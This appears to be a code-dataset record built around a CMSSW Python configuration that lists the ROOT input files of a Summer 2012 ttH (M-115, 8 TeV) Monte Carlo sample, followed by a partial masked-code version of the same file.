'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root'
])
secFiles.extend([])
<|reserved_special_token_1|>
import FWCore.ParameterSet.Config as cms
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
readFiles.extend( [
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root' ] );
secFiles.extend( [
] )
|
flexible
|
{
"blob_id": "965bb4c8e7d6650dab7f002645dceacab59a0c5c",
"index": 7298,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nreadFiles.extend([\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root'\n ,\n 